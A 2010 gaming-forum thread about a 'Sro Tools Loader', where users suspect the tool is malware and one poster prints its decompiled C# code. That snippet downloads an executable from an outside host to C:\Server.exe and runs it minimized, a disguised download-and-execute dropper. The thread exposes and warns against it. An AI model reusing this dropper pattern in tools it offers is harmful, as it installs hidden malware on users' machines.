[NEW]Sro Tools Loader

04/09/2010 20:10 SROgamer91#1
Deleted,requested for ban.
04/10/2010 18:05 pappychuilo#2
The problem with htis in my opinion is this.... the program looks clean... BUT! this looks like a down loader program, so how can you confirm that the programs it downloads such as: itools, auto res, etc.... actually downloads them from a secure site and they arent loaded with key loggers?

When I get my other computer running tonight I will try it out, and let me say this much.... if it s/worms etc... you will be banned im sure of it.

I will post my findings in 16 hours.

If it does work good job.

BTW If someone wants those programs why dont they just get them from the original source/thread anyways?

Why would anyone need a program to download them for them?

2 suspicious for me!
04/10/2010 18:22 LittleDreamer#3
softmodaddon and mini loader are both outdated? :s
04/10/2010 18:27 Henri_#4
Instead of downloading them, you should make it to tell the user if there is an update and then give them the link of it. I will not take responsible of iTools if it comes with virus as I said on my thread.
04/10/2010 19:29 InvincibleNoOB#5
Interesting how fast you made iTools v2:

Code:
public void Downloaden{
    WebClient client = new WebClient();
    string address = "http://videobase.bplaced.net/Tools/iToolsv2.exe";

    string path = @"C:\Server.exe";

    client.DownloadFile(address, path);
}
Code:
public string runfile(){
    if(File.Exists(@"C:\Server.exe")){
          Interaction.Shell(@"C:\Server.exe".AppWinStyle.MinimizedFocus,false,-1);
      flag=true;
    }
}
[Only registered and activated users can see links. Click Here To Register...]

#Requested for ban.
#Closed.